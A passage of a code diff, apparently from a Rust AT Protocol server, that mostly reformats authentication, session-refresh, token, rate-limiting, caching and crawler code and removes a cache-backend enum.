"$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK"); 91 + let _ = verify( 92 + &input.password, 93 + "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK", 94 + ); 92 95 warn!("User not found for login attempt"); 93 - return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()).into_response(); 96 + return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()) 97 + .into_response(); 94 98 } 95 99 Err(e) => { 96 100 error!("Database error fetching user: {:?}", e); ··· 114 118 .fetch_all(&state.db) 115 119 .await 116 120 .unwrap_or_default(); 117 - app_passwords.iter().any(|app| verify(&input.password, &app.password_hash).unwrap_or(false)) 121 + app_passwords 122 + .iter() 123 + .any(|app| verify(&input.password, &app.password_hash).unwrap_or(false)) 118 124 }; 119 125 if !password_valid { 120 126 warn!("Password verification failed for login attempt"); 121 - return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()).into_response(); 127 + return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()) 128 + .into_response(); 122 129 } 123 - let is_verified = row.email_confirmed 124 - || row.discord_verified 125 - || row.telegram_verified 126 - || row.signal_verified; 130 + let is_verified = 131 + row.email_confirmed || row.discord_verified || row.telegram_verified || row.signal_verified; 127 132 if !is_verified { 128 133 warn!("Login attempt for unverified account: {}", row.did); 129 134 return ( ··· 133 138 "message": "Please verify your account before logging in", 134 139 "did": row.did 135 140 })), 136 - ).into_response(); 141 + ) 142 + .into_response(); 137 143 } 138 144 let access_meta = match crate::auth::create_access_token_with_metadata(&row.did, &key_bytes) { 139 145 Ok(m) => m, ··· 169 175 refresh_jwt: refresh_meta.token, 170 176 handle: full_handle, 171 177 did: row.did, 172 - }).into_response() 178 + }) 179 + .into_response() 173 180 } 174 181 175 182 pub async fn get_session( ··· 220 227 headers: axum::http::HeaderMap, 221 228 ) -> Response { 222 229 let token = match crate::auth::extract_bearer_token_from_header( 223 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 230 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 224 231 ) { 225 232 Some(t) => t, 226 233 None => return ApiError::AuthenticationRequired.into_response(), ··· 254 261 headers: axum::http::HeaderMap, 255 262 ) -> Response { 256 263 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 257 - if !state.check_rate_limit(RateLimitKind::RefreshSession, &client_ip).await { 264 + if !state 265 + .check_rate_limit(RateLimitKind::RefreshSession, &client_ip) 266 + .await 267 + { 258 268 tracing::warn!(ip = %client_ip, "Refresh session rate limit exceeded"); 259 269 return ( 260 270 axum::http::StatusCode::TOO_MANY_REQUESTS, ··· 262 272 "error": "RateLimitExceeded", 263 273 "message": "Too many requests. Please try again later." 264 274 })), 265 - ).into_response(); 275 + ) 276 + .into_response(); 266 277 } 267 278 let refresh_token = match crate::auth::extract_bearer_token_from_header( 268 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 279 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 269 280 ) { 270 281 Some(t) => t, 271 282 None => return ApiError::AuthenticationRequired.into_response(), 272 283 }; 273 284 let refresh_jti = match crate::auth::get_jti_from_token(&refresh_token) { 274 285 Ok(jti) => jti, 275 - Err(_) => return ApiError::AuthenticationFailedMsg("Invalid token format".into()).into_response(), 286 + Err(_) => { 287 + return ApiError::AuthenticationFailedMsg("Invalid token format".into()) 288 + .into_response(); 289 + } 276 290 }; 277 291 let mut tx = match state.db.begin().await { 278 292 Ok(tx) => tx, ··· 288 302 .fetch_optional(&mut *tx) 289 303 .await 290 304 { 291 - warn!("Refresh token reuse detected! Revoking token family for session_id: {}", session_id); 305 + warn!( 306 + "Refresh token reuse detected! Revoking token family for session_id: {}", 307 + session_id 308 + ); 292 309 let _ = sqlx::query!("DELETE FROM session_tokens WHERE id = $1", session_id) 293 310 .execute(&mut *tx) 294 311 .await; 295 312 let _ = tx.commit().await; 296 - return ApiError::ExpiredTokenMsg("Refresh token has been revoked due to suspected compromise".into()).into_response(); 313 + return ApiError::ExpiredTokenMsg( 314 + "Refresh token has been revoked due to suspected compromise".into(), 315 + ) 316 + .into_response(); 297 317 } 298 318 let session_row = match sqlx::query!( 299 319 r#"SELECT st.id, st.did, k.key_bytes, k.encryption_version ··· 308 328 .await 309 329 { 310 330 Ok(Some(row)) => row, 311 - Ok(None) => return ApiError::AuthenticationFailedMsg("Invalid refresh token".into()).into_response(), 312 - Err(e) => { 313 - error!("Database error fetching session: {:?}", e); 314 - return ApiError::InternalError.into_response(); 331 + Ok(None) => { 332 + return ApiError::AuthenticationFailedMsg("Invalid refresh token".into()) 333 + .into_response(); 315 334 } 316 - }; 317 - let key_bytes = match crate::config::decrypt_key(&session_row.key_bytes, session_row.encryption_version) { 318 - Ok(k) => k, 319 335 Err(e) => { 320 - error!("Failed to decrypt user key: {:?}", e); 336 + error!("Database error fetching session: {:?}", e); 321 337 return ApiError::InternalError.into_response(); 322 338 } 323 339 }; 340 + let key_bytes = 341 + match crate::config::decrypt_key(&session_row.key_bytes, session_row.encryption_version) { 342 + Ok(k) => k, 343 + Err(e) => { 344 + error!("Failed to decrypt user key: {:?}", e); 345 + return ApiError::InternalError.into_response(); 346 + } 347 + }; 324 348 if crate::auth::verify_refresh_token(&refresh_token, &key_bytes).is_err() { 325 349 return ApiError::AuthenticationFailedMsg("Invalid refresh token".into()).into_response(); 326 350 } 327 - let new_access_meta = match crate::auth::create_access_token_with_metadata(&session_row.did, &key_bytes) { 328 - Ok(m) => m, 329 - Err(e) => { 330 - error!("Failed to create access token: {:?}", e); 331 - return ApiError::InternalError.into_response(); 332 - } 333 - }; 334 - let new_refresh_meta = match crate::auth::create_refresh_token_with_metadata(&session_row.did, &key_bytes) { 335 - Ok(m) => m, 336 - Err(e) => { 337 - error!("Failed to create refresh token: {:?}", e); 338 - return ApiError::InternalError.into_response(); 339 - } 340 - }; 351 + let new_access_meta = 352 + match crate::auth::create_access_token_with_metadata(&session_row.did, &key_bytes) { 353 + Ok(m) => m, 354 + Err(e) => { 355 + error!("Failed to create access token: {:?}", e); 356 + return ApiError::InternalError.into_response(); 357 + } 358 + }; 359 + let new_refresh_meta = 360 + match crate::auth::create_refresh_token_with_metadata(&session_row.did, &key_bytes) { 361 + Ok(m) => m, 362 + Err(e) => { 363 + error!("Failed to create refresh token: {:?}", e); 364 + return ApiError::InternalError.into_response(); 365 + } 366 + }; 341 367 match sqlx::query!( 342 368 "INSERT INTO used_refresh_tokens (refresh_jti, session_id) VALUES ($1, $2) ON CONFLICT (refresh_jti) DO NOTHING", 343 369 refresh_jti, ··· 482 508 warn!("Invalid verification code for user: {}", input.did); 483 509 return ApiError::InvalidRequest("Invalid verification code".into()).into_response(); 484 510 } 485 - if let Some(expires_at) = row.email_confirmation_code_expires_at { 486 - if expires_at < Utc::now() { 511 + if let Some(expires_at) = row.email_confirmation_code_expires_at 512 + && expires_at < Utc::now() { 487 513 warn!("Verification code expired for user: {}", input.did); 488 - return ApiError::ExpiredTokenMsg("Verification code has expired".into()).into_response(); 514 + return ApiError::ExpiredTokenMsg("Verification code has expired".into()) 515 + .into_response(); 489 516 } 490 - } 491 517 let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { 492 518 Ok(k) => k, 493 519 Err(e) => { ··· 545 571 if let Err(e) = crate::notifications::enqueue_welcome(&state.db, row.id, &hostname).await { 546 572 warn!("Failed to enqueue welcome notification: {:?}", e); 547 573 } 548 - let email_confirmed = matches!(row.channel, crate::notifications::NotificationChannel::Email); 574 + let email_confirmed = matches!( 575 + row.channel, 576 + crate::notifications::NotificationChannel::Email 577 + ); 549 578 let preferred_channel = match row.channel { 550 579 crate::notifications::NotificationChannel::Email => "email", 551 580 crate::notifications::NotificationChannel::Discord => "discord", ··· 561 590 email_confirmed, 562 591 preferred_channel: preferred_channel.to_string(), 563 592 preferred_channel_verified: true, 564 - }).into_response() 593 + }) 594 + .into_response() 565 595 } 566 596 567 597 #[derive(Deserialize)] ··· 597 627 return ApiError::InternalError.into_response(); 598 628 } 599 629 }; 600 - let is_verified = row.email_confirmed 601 - || row.discord_verified 602 - || row.telegram_verified 603 - || row.signal_verified; 630 + let is_verified = 631 + row.email_confirmed || row.discord_verified || row.telegram_verified || row.signal_verified; 604 632 if is_verified { 605 633 return ApiError::InvalidRequest("Account is already verified".into()).into_response(); 606 634 } ··· 619 647 return ApiError::InternalError.into_response(); 620 648 } 621 649 let (channel_str, recipient) = match row.channel { 622 - crate::notifications::NotificationChannel::Email => ("email", row.email.clone().unwrap_or_default()), 650 + crate::notifications::NotificationChannel::Email => { 651 + ("email", row.email.clone().unwrap_or_default()) 652 + } 623 653 crate::notifications::NotificationChannel::Discord => { 624 654 ("discord", row.discord_id.unwrap_or_default()) 625 655 } ··· 636 666 channel_str, 637 667 &recipient, 638 668 &verification_code, 639 - ).await { 669 + ) 670 + .await 671 + { 640 672 warn!("Failed to enqueue verification notification: {:?}", e); 641 673 } 642 674 Json(json!({"success": true})).into_response()
+1 -5
src/api/server/signing_key.rs
··· 58 58 .await; 59 59 match result { 60 60 Ok(row) => { 61 - info!( 62 - "Reserved signing key {} for did {:?}", 63 - row.id, 64 - input.did 65 - ); 61 + info!("Reserved signing key {} for did {:?}", row.id, input.did); 66 62 ( 67 63 StatusCode::OK, 68 64 Json(ReserveSigningKeyOutput {
+11 -15
src/api/temp.rs
··· 1 + use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 2 + use crate::state::AppState; 1 3 use axum::{ 2 4 Json, 3 5 extract::State, ··· 6 8 }; 7 9 use serde::Serialize; 8 10 use serde_json::json; 9 - use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 10 - use crate::state::AppState; 11 11 12 12 #[derive(Serialize)] 13 13 #[serde(rename_all = "camelCase")] ··· 19 19 pub estimated_time_ms: Option<i64>, 20 20 } 21 21 22 - pub async fn check_signup_queue( 23 - State(state): State<AppState>, 24 - headers: HeaderMap, 25 - ) -> Response { 26 - if let Some(token) = extract_bearer_token_from_header( 27 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 28 - ) { 29 - if let Ok(user) = validate_bearer_token(&state.db, &token).await { 30 - if user.is_oauth { 22 + pub async fn check_signup_queue(State(state): State<AppState>, headers: HeaderMap) -> Response { 23 + if let Some(token) = 24 + extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok())) 25 + && let Ok(user) = validate_bearer_token(&state.db, &token).await 26 + && user.is_oauth { 31 27 return ( 32 28 StatusCode::FORBIDDEN, 33 29 Json(json!({ 34 30 "error": "Forbidden", 35 31 "message": "OAuth credentials are not supported for this endpoint" 36 32 })), 37 - ).into_response(); 33 + ) 34 + .into_response(); 38 35 } 39 - } 40 - } 41 36 Json(CheckSignupQueueOutput { 42 37 activated: true, 43 38 place_in_queue: None, 44 39 estimated_time_ms: None, 45 - }).into_response() 40 + }) 41 + .into_response() 46 42 }
+14 -5
src/auth/extractor.rs
··· 1 1 use axum::{ 2 + Json, 2 3 extract::FromRequestParts, 3 - http::{StatusCode, request::Parts, header::AUTHORIZATION}, 4 + http::{StatusCode, header::AUTHORIZATION, request::Parts}, 4 5 response::{IntoResponse, Response}, 5 - Json, 6 6 }; 7 7 use serde_json::json; 8 8 9 + use super::{ 10 + AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, 11 + validate_bearer_token_cached_allow_deactivated, 12 + }; 9 13 use crate::state::AppState; 10 - use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated}; 11 14 12 15 pub struct BearerAuth(pub AuthenticatedUser); 13 16 ··· 108 111 if token.is_empty() { 109 112 return None; 110 113 } 111 - return Some(ExtractedToken { token: token.to_string(), is_dpop: false }); 114 + return Some(ExtractedToken { 115 + token: token.to_string(), 116 + is_dpop: false, 117 + }); 112 118 } 113 119 114 120 if header.len() >= 5 && header[..5].eq_ignore_ascii_case("dpop ") { ··· 116 122 if token.is_empty() { 117 123 return None; 118 124 } 119 - return Some(ExtractedToken { token: token.to_string(), is_dpop: true }); 125 + return Some(ExtractedToken { 126 + token: token.to_string(), 127 + is_dpop: true, 128 + }); 120 129 } 121 130 122 131 None
+67 -47
src/auth/mod.rs
··· 10 10 pub mod token; 11 11 pub mod verify; 12 12 13 - pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header, extract_auth_token_from_header, ExtractedToken}; 13 + pub use extractor::{ 14 + AuthError, BearerAuth, BearerAuthAllowDeactivated, ExtractedToken, 15 + extract_auth_token_from_header, extract_bearer_token_from_header, 16 + }; 14 17 pub use token::{ 15 - create_access_token, create_refresh_token, create_service_token, 16 - create_access_token_with_metadata, create_refresh_token_with_metadata, 17 - TokenWithMetadata, 18 - TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, 19 - SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, 18 + SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS, 19 + TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token, 20 + create_access_token_with_metadata, create_refresh_token, create_refresh_token_with_metadata, 21 + create_service_token, 22 + }; 23 + pub use verify::{ 24 + get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token, 20 25 }; 21 - pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token}; 22 26 23 27 const KEY_CACHE_TTL_SECS: u64 = 300; 24 28 const SESSION_CACHE_TTL_SECS: u64 = 60; ··· 113 117 Some(status) => (Some(key), status.deactivated_at, status.takedown_ref), 114 118 None => (None, None, None), 115 119 } 116 - } else { 117 - if let Some(user) = sqlx::query!( 118 - "SELECT k.key_bytes, k.encryption_version, u.deactivated_at, u.takedown_ref 119 - FROM users u 120 - JOIN user_keys k ON u.id = k.user_id 121 - WHERE u.did = $1", 122 - did 123 - ) 124 - .fetch_optional(db) 125 - .await 126 - .ok() 127 - .flatten() 128 - { 129 - let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version) 130 - .map_err(|_| TokenValidationError::KeyDecryptionFailed)?; 120 + } else if let Some(user) = sqlx::query!( 121 + "SELECT k.key_bytes, k.encryption_version, u.deactivated_at, u.takedown_ref 122 + FROM users u 123 + JOIN user_keys k ON u.id = k.user_id 124 + WHERE u.did = $1", 125 + did 126 + ) 127 + .fetch_optional(db) 128 + .await 129 + .ok() 130 + .flatten() 131 + { 132 + let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version) 133 + .map_err(|_| TokenValidationError::KeyDecryptionFailed)?; 131 134 132 - if let Some(c) = cache { 133 - let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await; 134 - } 135 - 136 - (Some(key), user.deactivated_at, user.takedown_ref) 137 - } else { 138 - (None, None, None) 135 + if let Some(c) = cache { 136 + let _ = c 137 + .set_bytes( 138 + &key_cache_key, 139 + &key, 140 + Duration::from_secs(KEY_CACHE_TTL_SECS), 141 + ) 142 + .await; 139 143 } 144 + 145 + (Some(key), user.deactivated_at, user.takedown_ref) 146 + } else { 147 + (None, None, None) 140 148 }; 141 149 142 150 if let Some(decrypted_key) = decrypted_key { ··· 175 183 176 184 session_valid = session_exists.is_some(); 177 185 178 - if session_valid { 179 - if let Some(c) = cache { 180 - let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await; 186 + if session_valid 187 + && let Some(c) = cache { 188 + let _ = c 189 + .set( 190 + &session_cache_key, 191 + "1", 192 + Duration::from_secs(SESSION_CACHE_TTL_SECS), 193 + ) 194 + .await; 181 195 } 182 - } 183 196 } 184 197 185 198 if session_valid { ··· 193 206 } 194 207 } 195 208 196 - if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) { 197 - if let Some(oauth_token) = sqlx::query!( 209 + if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) 210 + && let Some(oauth_token) = sqlx::query!( 198 211 r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref, 199 212 k.key_bytes as "key_bytes?", k.encryption_version as "encryption_version?" 200 213 FROM oauth_token t ··· 218 231 219 232 let now = chrono::Utc::now(); 220 233 if oauth_token.expires_at > now { 221 - let key_bytes = if let (Some(kb), Some(ev)) = (&oauth_token.key_bytes, oauth_token.encryption_version) { 234 + let key_bytes = if let (Some(kb), Some(ev)) = 235 + (&oauth_token.key_bytes, oauth_token.encryption_version) 236 + { 222 237 crate::config::decrypt_key(kb, Some(ev)).ok() 223 238 } else { 224 239 None ··· 230 245 }); 231 246 } 232 247 } 233 - } 234 248 235 249 Err(TokenValidationError::AuthenticationFailed) 236 250 } ··· 256 270 return validate_bearer_token(db, token).await; 257 271 } 258 272 } 259 - match crate::oauth::verify::verify_oauth_access_token(db, token, dpop_proof, http_method, http_uri).await { 273 + match crate::oauth::verify::verify_oauth_access_token( 274 + db, 275 + token, 276 + dpop_proof, 277 + http_method, 278 + http_uri, 279 + ) 280 + .await 281 + { 260 282 Ok(result) => { 261 283 if !allow_deactivated { 262 284 let deactivated = sqlx::query_scalar!( ··· 272 294 return Err(TokenValidationError::AccountDeactivated); 273 295 } 274 296 } 275 - let takedown = sqlx::query_scalar!( 276 - "SELECT takedown_ref FROM users WHERE did = $1", 277 - result.did 278 - ) 279 - .fetch_optional(db) 280 - .await 281 - .ok() 282 - .flatten() 283 - .flatten(); 297 + let takedown = 298 + sqlx::query_scalar!("SELECT takedown_ref FROM users WHERE did = $1", result.did) 299 + .fetch_optional(db) 300 + .await 301 + .ok() 302 + .flatten() 303 + .flatten(); 284 304 if takedown.is_some() { 285 305 return Err(TokenValidationError::AccountTakedown); 286 306 }
+46 -8
src/auth/token.rs
··· 33 33 } 34 34 35 35 pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 36 - create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120)) 36 + create_signed_token_with_metadata( 37 + did, 38 + SCOPE_ACCESS, 39 + TOKEN_TYPE_ACCESS, 40 + key_bytes, 41 + Duration::minutes(120), 42 + ) 37 43 } 38 44 39 - pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 40 - create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90)) 45 + pub fn create_refresh_token_with_metadata( 46 + did: &str, 47 + key_bytes: &[u8], 48 + ) -> Result<TokenWithMetadata> { 49 + create_signed_token_with_metadata( 50 + did, 51 + SCOPE_REFRESH, 52 + TOKEN_TYPE_REFRESH, 53 + key_bytes, 54 + Duration::days(90), 55 + ) 41 56 } 42 57 43 58 pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> { ··· 132 147 Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token) 133 148 } 134 149 135 - pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 136 - create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120)) 150 + pub fn create_access_token_hs256_with_metadata( 151 + did: &str, 152 + secret: &[u8], 153 + ) -> Result<TokenWithMetadata> { 154 + create_hs256_token_with_metadata( 155 + did, 156 + SCOPE_ACCESS, 157 + TOKEN_TYPE_ACCESS, 158 + secret, 159 + Duration::minutes(120), 160 + ) 137 161 } 138 162 139 - pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 140 - create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90)) 163 + pub fn create_refresh_token_hs256_with_metadata( 164 + did: &str, 165 + secret: &[u8], 166 + ) -> Result<TokenWithMetadata> { 167 + create_hs256_token_with_metadata( 168 + did, 169 + SCOPE_REFRESH, 170 + TOKEN_TYPE_REFRESH, 171 + secret, 172 + Duration::days(90), 173 + ) 141 174 } 142 175 143 - pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> { 176 + pub fn create_service_token_hs256( 177 + did: &str, 178 + aud: &str, 179 + lxm: &str, 180 + secret: &[u8], 181 + ) -> Result<String> { 144 182 let expiration = Utc::now() 145 183 .checked_add_signed(Duration::seconds(60)) 146 184 .expect("valid timestamp")
+22 -12
src/auth/verify.rs
··· 1 + use super::token::{ 2 + SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS, 3 + TOKEN_TYPE_REFRESH, 4 + }; 1 5 use super::{Claims, Header, TokenData, UnsafeClaims}; 2 - use super::token::{TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED}; 3 6 use anyhow::{Context, Result, anyhow}; 4 7 use base64::Engine as _; 5 8 use base64::engine::general_purpose::URL_SAFE_NO_PAD; ··· 40 43 let claims: serde_json::Value = 41 44 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 42 45 43 - claims.get("jti") 46 + claims 47 + .get("jti") 44 48 .and_then(|j| j.as_str()) 45 49 .map(|s| s.to_string()) 46 50 .ok_or_else(|| "No jti claim in token".to_string()) ··· 108 112 let header: Header = 109 113 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 110 114 111 - if let Some(expected) = expected_typ { 112 - if header.typ != expected { 113 - return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 115 + if let Some(expected) = expected_typ 116 + && header.typ != expected { 117 + return Err(anyhow!( 118 + "Invalid token type: expected {}, got {}", 119 + expected, 120 + header.typ 121 + )); 114 122 } 115 - } 116 123 117 124 let signature_bytes = URL_SAFE_NO_PAD 118 125 .decode(signature_b64) ··· 177 184 return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg)); 178 185 } 179 186 180 - if let Some(expected) = expected_typ { 181 - if header.typ != expected { 182 - return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 187 + if let Some(expected) = expected_typ 188 + && header.typ != expected { 189 + return Err(anyhow!( 190 + "Invalid token type: expected {}, got {}", 191 + expected, 192 + header.typ 193 + )); 183 194 } 184 - } 185 195 186 196 let signature_bytes = URL_SAFE_NO_PAD 187 197 .decode(signature_b64) ··· 189 199 190 200 let message = format!("{}.{}", header_b64, claims_b64); 191 201 192 - let mut mac = HmacSha256::new_from_slice(secret) 193 - .map_err(|e| anyhow!("Invalid secret: {}", e))?; 202 + let mut mac = 203 + HmacSha256::new_from_slice(secret).map_err(|e| anyhow!("Invalid secret: {}", e))?; 194 204 mac.update(message.as_bytes()); 195 205 196 206 let expected_signature = mac.finalize().into_bytes();
+2 -43
src/cache/mod.rs
··· 32 32 33 33 impl ValkeyCache { 34 34 pub async fn new(url: &str) -> Result<Self, CacheError> { 35 - let client = redis::Client::open(url) 36 - .map_err(|e| CacheError::Connection(e.to_string()))?; 35 + let client = redis::Client::open(url).map_err(|e| CacheError::Connection(e.to_string()))?; 37 36 let manager = client 38 37 .get_connection_manager() 39 38 .await ··· 118 117 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool { 119 118 let mut conn = self.conn.clone(); 120 119 let full_key = format!("rl:{}", key); 121 - let window_secs = ((window_ms + 999) / 1000).max(1) as i64; 120 + let window_secs = window_ms.div_ceil(1000).max(1) as i64; 122 121 let count: Result<i64, _> = redis::cmd("INCR") 123 122 .arg(&full_key) 124 123 .query_async(&mut conn) ··· 147 146 impl DistributedRateLimiter for NoOpRateLimiter { 148 147 async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool { 149 148 true 150 - } 151 - } 152 - 153 - pub enum CacheBackend { 154 - Valkey(ValkeyCache), 155 - NoOp, 156 - } 157 - 158 - impl CacheBackend { 159 - pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> { 160 - match self { 161 - CacheBackend::Valkey(cache) => { 162 - Arc::new(RedisRateLimiter::new(cache.connection())) 163 - } 164 - CacheBackend::NoOp => Arc::new(NoOpRateLimiter), 165 - } 166 - } 167 - } 168 - 169 - #[async_trait] 170 - impl Cache for CacheBackend { 171 - async fn get(&self, key: &str) -> Option<String> { 172 - match self { 173 - CacheBackend::Valkey(c) => c.get(key).await, 174 - CacheBackend::NoOp => None, 175 - } 176 - } 177 - 178 - async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 179 - match self { 180 - CacheBackend::Valkey(c) => c.set(key, value, ttl).await, 181 - CacheBackend::NoOp => Ok(()), 182 - } 183 - } 184 - 185 - async fn delete(&self, key: &str) -> Result<(), CacheError> { 186 - match self { 187 - CacheBackend::Valkey(c) => c.delete(key).await, 188 - CacheBackend::NoOp => Ok(()), 189 - } 190 149 } 191 150 } 192 151
+7 -2
src/circuit_breaker.rs
··· 1 - use std::sync::atomic::{AtomicU32, AtomicU64, Ordering}; 2 1 use std::sync::Arc; 2 + use std::sync::atomic::{AtomicU32, AtomicU64, Ordering}; 3 3 use std::time::Duration; 4 4 use tokio::sync::RwLock; 5 5 ··· 22 22 } 23 23 24 24 impl CircuitBreaker { 25 - pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self { 25 + pub fn new( 26 + name: &str, 27 + failure_threshold: u32, 28 + success_threshold: u32, 29 + timeout_secs: u64, 30 + ) -> Self { 26 31 Self { 27 32 name: name.to_string(), 28 33 failure_threshold,
+16 -9
src/config.rs
··· 1 1 #[allow(deprecated)] 2 - use aes_gcm::{ 3 - Aes256Gcm, KeyInit, Nonce, 4 - aead::Aead, 5 - }; 2 + use aes_gcm::{Aes256Gcm, KeyInit, Nonce, aead::Aead}; 6 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 7 4 use hkdf::Hkdf; 8 5 use p256::ecdsa::SigningKey; ··· 62 59 hasher.update(jwt_secret.as_bytes()); 63 60 let seed = hasher.finalize(); 64 61 65 - let signing_key = SigningKey::from_slice(&seed) 66 - .unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e)); 62 + let signing_key = SigningKey::from_slice(&seed).unwrap_or_else(|e| { 63 + panic!( 64 + "Failed to create signing key from seed: {}. This is a bug.", 65 + e 66 + ) 67 + }); 67 68 68 69 let verifying_key = signing_key.verifying_key(); 69 70 let point = verifying_key.to_encoded_point(false); 70 71 71 72 let signing_key_x = URL_SAFE_NO_PAD.encode( 72 - point.x().expect("EC point missing X coordinate - this should never happen") 73 + point 74 + .x() 75 + .expect("EC point missing X coordinate - this should never happen"), 73 76 ); 74 77 let signing_key_y = URL_SAFE_NO_PAD.encode( 75 - point.y().expect("EC point missing Y coordinate - this should never happen") 78 + point 79 + .y() 80 + .expect("EC point missing Y coordinate - this should never happen"), 76 81 ); 77 82 78 83 let mut kid_hasher = Sha256::new(); ··· 114 119 } 115 120 116 121 pub fn get() -> &'static Self { 117 - CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first") 122 + CONFIG 123 + .get() 124 + .expect("AuthConfig not initialized - call AuthConfig::init() first") 118 125 } 119 126 120 127 pub fn jwt_secret(&self) -> &str {
+7 -5
src/crawlers.rs
··· 1 1 use crate::circuit_breaker::CircuitBreaker; 2 2 use crate::sync::firehose::SequencedEvent; 3 3 use reqwest::Client; 4 - use std::sync::atomic::{AtomicU64, Ordering}; 5 4 use std::sync::Arc; 5 + use std::sync::atomic::{AtomicU64, Ordering}; 6 6 use std::time::Duration; 7 7 use tokio::sync::{broadcast, watch}; 8 8 use tracing::{debug, error, info, warn}; ··· 78 78 return; 79 79 } 80 80 81 - if let Some(cb) = &self.circuit_breaker { 82 - if !cb.can_execute().await { 81 + if let Some(cb) = &self.circuit_breaker 82 + && !cb.can_execute().await { 83 83 debug!("Skipping crawler notification due to circuit breaker open"); 84 84 return; 85 85 } 86 - } 87 86 88 87 self.mark_notified(); 89 88 let circuit_breaker = self.circuit_breaker.clone(); 90 89 91 90 for crawler_url in &self.crawler_urls { 92 - let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/')); 91 + let url = format!( 92 + "{}/xrpc/com.atproto.sync.requestCrawl", 93 + crawler_url.trim_end_matches('/') 94 + ); 93 95 let hostname = self.hostname.clone(); 94 96 let client = self.http_client.clone(); 95 97 let cb = circuit_breaker.clone();
+20 -7
src/image/mod.rs
